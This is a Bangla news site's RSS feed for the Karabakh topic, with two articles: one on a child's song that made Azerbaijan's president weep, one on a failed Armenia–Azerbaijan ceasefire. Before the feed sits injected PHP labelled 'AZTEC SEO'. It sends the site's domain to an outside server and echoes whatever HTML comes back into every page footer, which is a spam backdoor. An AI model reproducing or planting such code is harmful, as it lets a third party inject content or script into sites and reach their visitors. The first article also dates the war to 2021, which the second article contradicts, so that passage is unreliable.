/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); কারাবাখ – Dhaka Sky News https://www.dhakaskynews.com Dhaka Sky News Fri, 27 Jan 2023 05:56:16 +0000 en-US hourly 1 https://wordpress.org/?v=6.9.9 শিশুকণ্ঠে দেশাত্ববোধক গান শুনে কাঁদলেন প্রেসিডেন্ট (ভিডিও) https://www.dhakaskynews.com/international/2023/01/27/News_ID-3828/ https://www.dhakaskynews.com/international/2023/01/27/News_ID-3828/#respond Fri, 27 Jan 2023 05:29:55 +0000 https://www.dhakaskynews.com/?p=3828 আজারবাইজানের কারাবাখ বিজয়ের প্রতীক কেনান বায়রামলি (এক প্রকার বিজয়গীতি)। দেশটির মুক্ত শহর শুশাতে অনুষ্ঠিত একটি উৎসবের সময় এক শিশুর কণ্ঠে কেনান বায়রামলির সুললিত সুর লাখ লাখ মানুষের হৃদয় স্পর্শ করেছে। আজারবাইজানের প্রেসিডেন্ট ইলহাম আলিয়েভ নিজেও চোখের পানি ধরে রাখতে পারেননি।

আর্মেনিয়ার সঙ্গে নাগোরনো কারাবাখ নিয়ে আজারবাইজানের প্রায় তিন দশকের দ্বন্দ্ব ছিল। ১৯৯১ সালে আর্মেনিয়ার সেনারা আজারবাইজানের কাছ থেকে এ অঞ্চল দখল করে নেয়। অঞ্চলটিতে বসবাসকারী আর্মেনিয়ার সেনারা প্রায়ই যুদ্ধবিরতি লঙ্ঘন করে আজারবাইজানের নাগরিকদের ওপর হামলা চালাত। আর এর পরিপ্রেক্ষিতে ২০২১ সালের সেপ্টেম্বরে উভয় দেশের মধ্যে যুদ্ধ শুরু হয়। ৪৩ দিনব্যাপী এ যুদ্ধ চলে।

তুরস্ক এ যুদ্ধে কোনো রাখঢাক ছাড়াই আজারবাইজানকে সমর্থন দেয়। তুরস্কের ড্রোন বায়রাক্তার ব্যবহার করে যুদ্ধে আজেরি সেনারা অভূতপূর্ব সফলতা পান। তারা বেশ কিছু গুরুত্বপূর্ণ শহর উদ্ধার করেন। পরে রাশিয়ার মধ্যস্থতায় উভয়পক্ষ যুদ্ধবিরতি চুক্তি করে।

]]>
https://www.dhakaskynews.com/international/2023/01/27/News_ID-3828/feed/ 0
দ্বিতীয় যুদ্ধবিরতিও ব্যর্থ; আবার মস্কোয় হাজির দুই পররাষ্ট্রমন্ত্রী https://www.dhakaskynews.com/international/2020/10/21/News_ID-1151/ https://www.dhakaskynews.com/international/2020/10/21/News_ID-1151/#respond Wed, 21 Oct 2020 17:57:36 +0000 https://www.dhakaskynews.com/?p=1151 আজারবাইজান ও আর্মেনিয়ার মধ্যকার দ্বিতীয় যুদ্ধবিরতি চুক্তিও ব্যর্থ হয়েছে। তবে সংঘাত বন্ধে কূটনৈতিক প্রচেষ্টা অব্যাহত আছে। এর অংশ হিসেবে আজারবাইজান ও আর্মেনিয়ার পররাষ্ট্রমন্ত্রীরা মস্কো সফরে গেছেন।

একই বিষয় নিয়ে দুপক্ষ ওয়াশিংটনে মার্কিন পররাষ্ট্রমন্ত্রী মাইক পম্পেওর সঙ্গে বৈঠক করবে। এর কয়েকদিন আগে মস্কোয় গেলেন তারা। নাগার্নো-কারাবাখের সংঘাত এরইমধ্যে চতুর্থ সপ্তাহে গড়িয়েছে।

রাশিয়ার সঙ্গে পরামর্শ করার জন্য আজারবাইজানের পররাষ্ট্রমন্ত্রী জেইহুন বাইরামভ আজ (বুধবার) মস্কোয় পৌঁছেছেন। আজারবাইজানের পররাষ্ট্র মন্ত্রণালয় এক বিবৃতিতে একথা জানিয়েছে।

এদিকে, আর্মেনিয়ার পররাষ্ট্রমন্ত্রী জোহরাব নাতসাকানিয়ান রুশ পররাষ্ট্রমন্ত্রী সের্গেই ল্যাভরভের সঙ্গে কারাবাখ পরিস্থিতি ও যুদ্ধবিরতি কার্যকর করার বিষয় নিয়ে আলোচনা করার জন্য মস্কো যাচ্ছেন। আর্মেনিয়ার পররাষ্ট্র মন্ত্রণালয়ের নারী মুখপাত্র আনা নাগদালিয়ান এ সফরের বিষয়ে বিবৃতি দিয়েছেন।

তবে দুই মন্ত্রী একসাথে ল্যাভরভের সঙ্গে আলোচনায় বসবেন নাকি আলাদাভাবে কথা বলবেন তা পরিষ্কার নয়। আগামী শুক্রবার আর্মেনিয়া ও আজারবাইজানের এ দুই মন্ত্রী ওয়াশিংটনে মার্কিন পররাষ্ট্রমন্ত্রী মাইক পম্পেওর সঙ্গে বৈঠকে বসবেন বলে কথা রয়েছে।
সূত্র : পার্সটুডে

]]>
https://www.dhakaskynews.com/international/2020/10/21/News_ID-1151/feed/ 0